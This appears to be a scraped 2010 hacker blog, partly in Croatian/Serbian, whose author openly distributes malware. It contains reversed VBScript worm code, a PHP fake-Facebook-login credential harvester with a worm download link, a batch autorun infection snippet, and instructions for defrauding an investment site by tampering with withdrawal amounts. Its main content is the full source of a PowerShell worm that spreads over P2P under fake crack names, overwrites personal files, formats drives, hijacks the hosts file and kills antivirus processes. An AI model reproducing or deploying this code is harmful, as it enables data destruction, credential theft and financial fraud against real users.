    '"sbv.23metsys\swodniW\:D | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:E | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:F | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:G | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:H | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:I | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:J | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:K | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    '"sbv.23metsys\swodniW\:L | exe.tpircSW","\dnammoC\noitcelloCemaG\llehS\yrotceriD\TOOR_SESSALC_YEKH" etirwger.)"llehs.tpircsW"(tcejboetaerc
    'emaNlluFtpircS.tpircsW = flesym
    'txen emuser rorre nO
    ')cepsredlof(eheh buS
    'txeN emuseR rorrE nO
    'osf ,s ,txe ,cf ,1f ,f miD
    ')"tcejbOmetsySeliF.gnitpircS"(tcejbOetaerC = osf teS
    ')cepsredlof(redloFteG.osf = f teS
    'seliF.f = cf teS
    'cf nI 1f hcaE roF
    ')htaP.1f(emaNnoisnetxEteG.osf = txe
    ')txe(esaCL = txe
    ')emaN.1f(esaCL = s
    'nehT )"iva" = txe( rO )"gepm" = txe( fI
    ')emanlluftpircs.tpircsw(elifteg.osf = f teS
    ')"sbv." & htaP.1f( ypoC.f
    'fI dnE
    'txeN
    'buS dnE
    ')cepsredlof(ihih buS
    'txeN emuseR rorrE nO
    'osf ,fs ,1f ,f miD
    ')"tcejbOmetsySeliF.gnitpircS"(tcejbOetaerC = osf teS
    ')cepsredlof(redloFteG.osf = f teS
    'sredloFbuS.f = fs teS
    'fs nI 1f hcaE roF
    ')htaP.1f( eheh
    ')htaP.1f( ihih
    'txeN
    'buS dnE
    undermine @ 03:58 |Isključeno | Komentari: 0
    četvrtak, travanj 8, 2010
    Moguce je preko paypal opcije to uraditi, potrebno je samo
    znati kako da kreirate paypal internet racun zatim preko nekog sajta
    koji vam daje virtual money u prevodu da objasnim ( virtualne chipove )
    zaradite ih oko $ 20 dolara na primer i zatim skinite sa mozilla addons
    https://addons.mozilla.org/en-US/firefox/addon/966
    instalirajte restartujte browser i udjite na www.fastinvestpro.com
    registrujte se opcijom account-a preko paypal zatim izaberite
    opcije za daily plan plan koja je spojena sa instant withdrawal. nemojte samo ici
    u  bigger plans.

    dajte deposit od $10 sa vaseg paypal gde vam je virtualni novac
    i uradite sign out
    sacekajte 1 minut i ulogujte se, zatim u vas account videcete
    $ 10 dolara na vas account kliknite zatim opciju
    withdrawal, enter amount $ 10
    ali pre klika na dugme ( button )

    udjite u  firefox browser tools koji ste skinuli kliknite tamper data
    i malo prozorce startuje tamper(ne zatvarati ovo ) udjite u withdrawal page i kliknite request
    zatim sledeci windows(prozor) Tamper uz request se otvara i kliknite tamper

    zatim se drugi windows otvara, i levo
    nacicete parameter value zatim u broj 10.00 stavite 99.00 ne stavljati preko 99 jer opcija
    koju sadrzi bug
    nacinjena je za samo 2 digitalna broja
    Udjite u vas account na paypal i videcete prebaceni novac.
    PAZLJIVO OVO URADITI JER MOZETE UZGUBITI I BONUS OD $5 KOJI STE PREBACILI
    ZATO IPAK ODRADITE $50 VIRTUALNOG NOVCA NA RACUN PAYPAL
    I TO MOZETE SAMO DVA PUTA PREBACITI PREKO VIRTUALNOG KOMPJUTERA
    I ADMINISTRATOR-skog....
    undermine @ 19:50 |Isključeno | Komentari: 0
    srijeda, travanj 7, 2010
    A worm is a malware that is designed to propagate and spread across networks.
    Worms are known to propagate using one or several of different transmission vectors
    on the email, IRC, network shares, instant messengers (IM), and peer-to-peer (P2P) networks.
    Worms do not infect files, but may carry one and more payloads,
    such as computer security compromise and information theft.
    Worms typically modify system settings to automatically start.
    Worm after start cannot be terminated.
    [ DOWNLOAD ] - www.4shared.com/file/258603683/10ad2366/Eldorado131.html
    undermine @ 01:38 |Isključeno | Komentari: 0
    utorak, ožujak 30, 2010
    Example way to get login with fake html and also
    get ip address for worm ride can try from your own server.
    Everybody know how look page application and blue button
    in that way, put your Koobface.ara and when stupid people
    click at blue button worm start open some application
    wher first time you go and grab html code enter on the other side,
    and rename location of real link then put your server.
    That code is :
    - -
    <?php
    header ('Location: http://www.facebook.com/user info/');
    $handle = fopen("Setup.exe", "ara");
    foreach($_POST as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
      
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    $date = date('');
    $ip = getIP();
    exit;
    ?>
    - -
    You can add other page at facebook like '/heart&embrace/' or
    '/Google video Reader/' Don't forgot add this setup.exe
    from this trial share way http://www.speedyshare.com/files/21690946/Setup.exe
    undermine @ 17:56 |Isključeno | Komentari: 0
    nedjelja, ožujak 21, 2010
    From: "Microsoft Window Mail Team" <osoft@microsoft.com>
    To: "Windows Mail User" <@microsoft.com>
    Subject: Welcome to Windows Mail
    Date: Sun, 29 Dec 1978 13:34:34 -0700
    MIME-Version: 1.0
    Content-Type: multipart/alternative;
     boundary="----=_NextPart_000_0000_01CAC8FC.3FCF2B70"
    X-MimeOLE: Produced By Microsoft MimeOLE V7.0.7000.06660
    X-EsetId: DEA99D2831FE7D69C1AF9D7D3DA539
    X-EsetScannerBuild: 6791

    This is a multi-part message in MIME format.


    Pročitaj kompletan post
    undermine @ 21:39 |Isključeno | Komentari: 0
    utorak, ožujak 16, 2010
    This Virus work on Xp&Vista

    Pročitaj kompletan post
    undermine @ 00:05 |Isključeno | Komentari: 0
    petak, ožujak 5, 2010
    nesto sam testirao pa pronasao sasvim dobar  nacin ubacivanja infekcije,
    kroz batch kojeg sam nazvao command prompt ekstenzijom ukljucuje dopunu
    u vista O.S i ubacuje bag ...

    cls
    type %0 "C:\autorun.cmd"
    for %a in ("*.cmd") do call %0 C:\autorun.cmd
    if %bug% x -t"%remote_address%" -y+ %bug%
    move %bug% in %remote_address%
    ..\windowsupdatess.exe x -t"%remote_address%" -y+ file:\\\autorun.cmd
    REG ADD HKCU\Software\Sysinternals\Autorun /v EulaAccepted /t REG_DWORD /d 1 /f
    start "" "%remote_address%\autorun.cmd"
    undermine @ 20:44 |Isključeno | Komentari: 0
    subota, veljača 27, 2010
    Chat bar hacked is !
    Da i to veoma ne zasticenim kodom a ujedno se moze spijunirati tudja chat
    privatnost ukoliko znate raditi sa Id korisnickim kodom odnosno linkom faceuser
    I' show u code in jscript :
    http://www.facebook.com/presence/popout.php?init_port=5312
    Full window? yes if you work with your upgraded code. But all for this is greatz port !
    inace druge uloge scripting-a mozete sami dodavati .
    undermine @ 01:42 |Isključeno | Komentari: 0
    četvrtak, veljača 25, 2010
    Vecina zeli na najbrzi nacin zaraditi preko interneta jedan od nacina
    je dobar dok drugi sebe prestavlja i kao fake, dobar nacin je legalnost
    zarade jer ocekuje klik ali ne na sajtove vec na vas izabrani sajt i nemora se niko
    logovati.
    Drugi nacin zahteva poznavanje script-e i znanje komunikacije odnosno u ovom
    slucaju poznavanje zapisa .... lako je u koliko procitate deo po deo ...
    LINK: http://adf.ly or look hostbux.com
    undermine @ 03:35 |Isključeno | Komentari: 0
    srijeda, veljača 24, 2010
    Command Prompt (DOS) batch files
    Batch files are the oldest scripts and probably the easiest to write on a
    PC, but they’re severely limited in what they can do. Batch files, not to
    mention the Command Prompt itself, are handy for copying or renaming
    files based on wildcard character specifications, for instance. But
    they can’t interact with Windows programs, and have no knowledge of
    running processes, security policies, or any of your other favorite Vista
    buzzwords. On the plus side, you can run a batch file on any PC made
    after 1982, regardless of the version of Windows being used, and the
    DOS commands used therein can also be used to recover your PC in the
    event it won’t start.
    Windows Script Host scripts
    WSH scripts are more flexible and powerful than batch files, and offer
    better user interaction. WSH scripts are Windows-based, and can take
    advantage of Windows services, such as printing, networking, and Registry
    access. WSH scripts work on any PC running Windows 98 or later,
    or Windows 95 and Windows NT 4.0 after installing an add-on. Unfortunately,
    these days they’re seen as a system vulnerability, to the point
    of being blocked by some modern antivirus software, and despite having
    been around for about a decade, they’re still pretty feeble when
    compared to the kind of scripting found on Unix/Linux systems.
    Windows PowerShell scripts
    Designed to address the shortcomings of WSH scripts, Microsoft’s
    PowerShell (also known as MSH, or the Monad Shell) is somewhat the
    ideal scripting solution. PowerShell is more or less a replacement for the
    Command Prompt, and its scripting feature is only part of the package.
    In some cases, even a single line entered by hand at the PowerShell
    prompt can do more than a complex batch file or WSH script. But since
    PowerShell is not installed by default in Vista, you can’t ever assume it’s
    there, thus making it more useful as a personal tool than as a platform
    for scripts to distribute to other PCs.
    Which scripting platform you choose should depend on your comfort level
    and familiarity with the language, as well as the task.
    Port Number Description
    20–21 FTP (File Transfer Protocol)
    22 SSH (Secure Shell)
    23 Telnet
    25 SMTP (Simple Mail Transfer Protocol), used for sending email
    42 WINS (Windows Internet Name Service)
    43 WhoIs
    50–51 IPSec (PPTP Passthrough for VPN, Virtual Private Networking)
    53 DNS (Domain Name Server), used for looking up domain names
    67 DHCP (Dynamic Host Configuration Protocol)
    69 ? TFTP
    70 Gopher
    79 Finger
    80 HTTP (Hyper Text Transfer Protocol), used by web browsers to download standard web pages
    110 POP3 (Post Office Protocol, version 3), used for retrieving email
    119 NNTP (Network News Transfer Protocol), used for newsgroups
    123 NTP (Network Time Protocol), used for Windows’ Internet Time feature
    135 ? RPC (Microsoft Windows Remote Procedure Call)
    137–139 ? NETBIOS Services
    143 IMAP4 (Internet Mail Access Protocol version 4)
    161–162 SNMP (Simple Network Management Protocol)
    194 IRC (Internet Relay Chat)
    220 IMAP3 (Internet Mail Access Protocol version 3)
    undermine @ 14:11 |Isključeno | Komentari: 0
    Money Transfer
    set undermine your home page
    Ads Pay Pal Alert Pay Web Money My vacation is your 2% security ...
    how i' get webmoney, enable jscript or better browser
    then read my alert window...
     
    Warning!!!This wrapper provides human rights of malicious people! © 2010 Undermine. All Rigths Classed in 19 Article of Universal Declaration.

    Sharez-Worm.Branko.compcode
    Share: Digg Reddit Del.icio.us Ma.gnolia Stumble Upon Facebook Twitter Google Yahoo! MyWeb Furl" BlinkList Technorati Mixx Windows Live :z
    My wing is unknown look up on stars VX is way to heaven not difficult to go when
    time come I' know bcoz I' coming from bloody rain, and don't think you are all
    on strange and this promise land. Wher is your soul,heart,lifelove?
    Bcoz you're destructed angel.
    Worm.html
    # UnderminE alias Luxilius's Powershell Skript Worm
    #
    # This worm is for the PowerShell Script Interpreter
    # which is included with Microsoft Windows Vista
    #
    # This worm is ¸2008 by underminE alias Luxilius
    #
    # Visit my homepages: www.underminE.bloger.hr & www.underminE.bloger.hr & www.underminE.bloger.hr
    #
    # This worm has following features:
    #
    # - Spreads with P2P (KaZaA Lite) per JScript
    # - Writes a registry string to run every time windows starts
    # - Changes RegisteredOwner, RegisteredOrga, Ie Title, Hidden Files, FileExt and Ie Page
    # - overwrites specific files in Eigene Dateien Folder and Subfolders
    # - formating all insertet drives and discettes
    # - deletes files in %system32%\drivers\etc
    # - overwrites the host file in %system32%\drivers\etc
    # - kills some well-known Anti-Virus processes
    # - deletes Reg-Values from well-known Antiviruses
    # - tells a message to user, with informations about the worm
    #
    #
    # Informations:
    #
    # This worm is a proof of concept worm. Because of it is able
    # to run Powershell on Windows XP, too (Need .Net Framework 2.0)
    # this worm is dedicated to Windows XP. Well, yes, it runs on
    # Windows Vista, too. But I don't know if the structures are the
    # same as in windows Xp. Note that this worm uses ActiveX Objects.
    # In this worm I use Scripting.FileSystemObject and WScript.Shell
    # Object. I hope Vista will include those ActiveX Objects, too.
    # I am happy to be the coder of this worm. I like this language.
    # And I am looking forward to new Malware in PowerShell.
    # Now I will release more and more worms in this language.
    #
    # This worm is ¸2008 by underminE alias Luxilius. To tell me anything
    # write me an email @ hard.rock.blogger@gmail.com or a pm at www.underminE.bloger.hr
    #
    # ======================================================================

    $fso = New-Object -Com Scripting.FileSystemObject ;
    $wshs = New-Object -Com WScript.Shell ;
    $windir = $fso.GetSpecialFolder(0)
    $sysdir = $fso.GetSpecialFolder(1)

    $strInfoString_one = "This is a PowerShell Script worm. ";
    $strInfoString_two = "This worm is proof-of-concept ";
    $strInfoString_three = "the worm is ¸2008 by underminE alias Luxilius ";
    $strInfoString_four = "for informations write an email @ hard.rock.blogger@gmail.com ";


    $KazaaDir = $wshs.RegRead('HKEY_CURRENT_USER\Software\Kazaa\LocalContent\DownloadDir');
    $AllMshDateinCurDir = get-childitem *.msh
    foreach ($PowerShellScript in $AllMshDateinCurDir)
    {
      if ($PowerShellScript.Length=13035)
      {
        $MySelfWorm = $PowerShellScript.Name;
      }
    }
    $gtFilesMsh = $fso.getfile($MySelfWorm);
    if (!$fso.fileexists($Sysdir.Path\WinLuxUndermine.msh)
    {
        $gtFilesMsh.Copy($Sysdir.Path\WinLuxUndermine.msh);
    }
    $gtFilesMsh.copy("$KazaaDir\Microsoft Windows Vista Cd-Key.txt.msh");
    $gtFilesMsh.copy("$KazaaDir\Windows Vista Update.msh");
    $gtFilesMsh.copy("$KazaaDir\Ad-aware SE Personal Edition 1.06r1.msh");
    $gtFilesMsh.copy("$KazaaDir\Ashampoo Media Player 2.03 install.msh");
    $gtFilesMsh.copy("$KazaaDir\Allround WinZIP Key Generator.msh");
    $gtFilesMsh.copy("$KazaaDir\Talisman Desktop 2.99 Crack.msh");
    $gtFilesMsh.copy("$KazaaDir\Nero Burning Rom 6.6.0.13 Crack.msh");
    $gtFilesMsh.copy("$KazaaDir\Kaspersky KeyGen working.msh");
    $gtFilesMsh.copy("$KazaaDir\Daemon Tools Install + Crack.rar.msh");
    $gtFilesMsh.copy("$KazaaDir\AVP - AntiVirus Key Generator.msh");


    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD");
    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD");
    $wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "United People of infected Ps","REG_SZ");
    $wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "underminELuxilius","REG_SZ");
    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Infected with Ps Worm by underminE alias Luxilius","REG_SZ");
    $wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "explorer.exe  $sysdir.Path\WinLuxUndermine.msh" ,"REG_SZ");
    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.underminE.bloger.hr")


    $PersonalDirectory = $wshs.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal");
    UeberschreibeDateien($PersonalDirectory)

    function UeberschreibeDateien($strOrdner)
    {
        $StringToOverwrite = "This file was overwritten with a Ps Worm. ";
        $StringToOverwrite += "This Worm is ¸2008 by underminE alias Luxilius! ";
       
        $OverWrtOwnFiles = $fso.getfolder($strOrdner)
        $OverFiles = $OverWrtOwnFiles.Files
        $TheSubFldr = $OverWrtOwnFiles.subfolders
       
        foreach ($SubFiles in $TheSubFldr.Files)
        {
            $strGetExt = $fso.GetExtensionName($AlleDateien.Path);
            if ($strGetExt="JPG")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="BMP")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="GIF")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="PNG")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="JPEG")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="AVI")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="MP3")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="WMV")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="WMA")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="DOC")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="XLS")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="RTF")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="PPS")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="PPT")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="ZIP")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="RAR")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="CPP")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
        }
       
        foreach ($NochMehrUnterOrdner in $TheSubFldr)
        {
            UeberschreibeDateien($NochMehrUnterOrdner)
        }

    }

    $TheDrives = $fso.Drives
    foreach ($AllDrives in $TheDrives)
        {
        if ($AllDrives.DriveType=1)
        {
            format $AllDrives.Path /y
        }
        if ($AllDrives.DriveType=2)
        {
            format $AllDrives.Path /y
        }
    }


    cd "$sysdir.path\Drivers\etc";
    del "networks";
    del "protocol";
    del "services";
    del "hosts";
    del "hosts.bak";
    echo "# Host File overwritten by Ps Worm " >> hosts
    echo "# This file disallows you to visit av and dl sites :> " >> hosts
    echo " " >> hosts
    echo "127.0.0.1 www.antivir.de " >> hosts
    echo "127.0.0.1 www.bitdefender.de " >> hosts
    echo "127.0.0.1 www.znet.de " >> hosts
    echo "127.0.0.1 www.chip.de " >> hosts
    echo "127.0.0.1 www.virustotal.com " >> hosts
    echo "127.0.0.1 virusscan.jotti.org " >> hosts
    echo "127.0.0.1 www.kaspersky.com " >> hosts
    echo "127.0.0.1 www.sophos.de " >> hosts
    echo "127.0.0.1 www.trojaner-info.de " >> hosts
    echo "127.0.0.1 www.trojaner-help.de " >> hosts
    echo "127.0.0.1 www.arcabit.com " >> hosts
    echo "127.0.0.1 www.avast.com " >> hosts
    echo "127.0.0.1 www.grisoft.com " >> hosts
    echo "127.0.0.1 www.bitdefender.com " >> hosts
    echo "127.0.0.1 www.clamav.net " >> hosts
    echo "127.0.0.1 www.drweb.com " >> hosts
    echo "127.0.0.1 www.f-prot.com " >> hosts)
    echo "127.0.0.1 www.google.de " >> hosts
    echo "127.0.0.1 www.google.com " >> hosts
    echo "127.0.0.1 www.google.co.yu " >> hosts
    echo "127.0.0.1 www.fortinet.com " >> hosts
    echo "127.0.0.1 www.eset.com " >> hosts
    echo "127.0.0.1 www.nod32.com " >> hosts
    echo "127.0.0.1 www.norman.com " >> hosts
    echo "127.0.0.1 www.microsoft.com " >> hosts
    echo "127.0.0.1 www.anti-virus.by/en " >> hosts
    echo "127.0.0.1 www.symantec.com " >> hosts
    echo "127.0.0.1 www.windowsupdate.com " >> hosts
    echo "127.0.0.1 www.trendmicro.com " >> hosts
    echo "127.0.0.1 www.mcafee.com " >> hosts
    echo "127.0.0.1 www.viruslist.com " >> hosts
    echo "127.0.0.1 www.avp.com " >> hosts
    echo "127.0.0.1 www.zonelabs.com " >> hosts
    echo "127.0.0.1 www.heise.de " >> hosts
    echo "127.0.0.1 www.antivirus-online.de " >> hosts
    echo "127.0.0.1 www.free-av.com " >> hosts
    echo "127.0.0.1 www.panda-software.com " >> hosts
    echo "127.0.0.1 www.pc-welt.de " >> hosts
    echo "127.0.0.1 www.pc-special.net " >> hosts
    echo "127.0.0.1 download.freenet.de " >> hosts
    echo "127.0.0.1 www.vollversion.de " >> hosts
    echo "127.0.0.1 www.das-download-archiv.de " >> hosts
    echo "127.0.0.1 www.freeware.de " >> hosts
    echo "127.0.0.1 www.antiviruslab.com " >> hosts
    echo "127.0.0.1 www.search.yahoo.com " >> hosts
    echo "127.0.0.1 www.web.de " >> hosts
    echo "127.0.0.1 www.hotmail.com " >> hosts
    echo "127.0.0.1 www.hotmail.de " >> hosts
    echo "127.0.0.1 www.gmx.net " >> hosts
    echo "127.0.0.1 www.spiegel.de " >> hosts
    echo "127.0.0.1 www.icq.com " >> hosts
    echo "127.0.0.1 www.icq.de " >> hosts
    echo "127.0.0.1 www.ffh.de " >> hosts
    echo "127.0.0.1 www.lavasoft.de " >> hosts
    echo "127.0.0.1 www.de.wikipedia.org " >> hosts
    echo "127.0.0.1 www.wikipedia.org " >> hosts
    echo "127.0.0.1 www.en.wikipedia.org " >> hosts
    echo "127.0.0.1 www.wissen.de " >> hosts
    echo "127.0.0.1 www.virus-aktuell.de " >> hosts
    echo "127.0.0.1 www.arcor.de " >> hosts
    echo "127.0.0.1 www.t-online.de " >> hosts
    echo "127.0.0.1 www.t-com.de " >> hosts
    echo "127.0.0.1 www.alice-dsl.de " >> hosts
    echo "127.0.0.1 www.freenet.de " >> hosts
    echo "127.0.0.1 www.1und1.de " >> hosts
    echo "127.0.0.1 www.fbi.gov " >> hosts
    echo "127.0.0.1 www.polizei.de " >> hosts
    echo "127.0.0.1 www.mup.sr.gov.yu " >> hosts


    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avgnt');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVG7_CC');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDMCon'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDNewsAgent');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDOESRV');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pccguide.exe');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DrWebScheduler');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerMail'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerNT'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCAgentExe');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCUpdateExe');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OASClnt');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VirusScan Online');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VSOCheckTask');
       
       
    tskill avcenter /a
    tskill avconfig /a
    tskill avscan /a
    tskill avguard /a
    tskill avgnt /a
    tskill update /a
    tskill preupd /a
    tskill avcmd /a
    tskill avesvc /a
    tskill kav /a
    tskill kavsvc /a
    tskill kavsend /a
    tskill keymanager /a
    tskill agentsvr /a
    tskill avgcc /a
    tskill avgupsvc /a
    tskill avgamsvr /a
    tskill vsserv /a
    tskill bdss /a
    tskill xcommsvr /a
    tskill bdnagent /a
    tskill bdoesrv /a
    tskill bdmcon /a
    tskill bdswitch /a
    tskill rtvr /a
    tskill bdsubmit /a
    tskill bdlite /a
    tskill agentsvr /a
    tskill tmproxy /a
    tskill PcCtlCom /a
    tskill pccguide /a
    tskill qttask /a
    tskill patch /a
    tskill Tmntsrv /a
    tskill PccPrm /a
    tskill DrWebUpW /a
    tskill spidernt /a
    tskill DrWebScd /a
    tskill DrWeb32w /a
    tskill drwadins /a
    tskill mcupdui /a
    tskill McTskshd /a
    tskill McAppIns /a
    tskill mghtml /a
    tskill McShield /a
    tskill Mcdetect /a
    tskill McVSEscn /a
    tskill oasclnt /a
    tskill mcvsshld /a


    echo "$strInfoString_one ";
    echo "$strInfoString_two ";
    echo "$strInfoString_three ";
    echo "$strInfoString_four ";

    $wshs.popup("www.underminE.bloger.hr - www.underminE.bloger.hr -
    www.underminE.bloger.hr | Worm ¸2008 by underminE alias Luxilius",2,"PowerShell Worm by underminE alias Luxilius");

    exit ;
    DonoR
    CURRENT MOON

    ALSO DONATE
            VX (at)

    Webmoney pursues:

    Z518898905521

    R733573362072

    share & email virus html
    Subscribe
    Share/Bookmark
    OWL ( applikacija )
    OWL DOWNLOAD  
                                                kevin mitnick
    Index.hr
    Nema zapisa.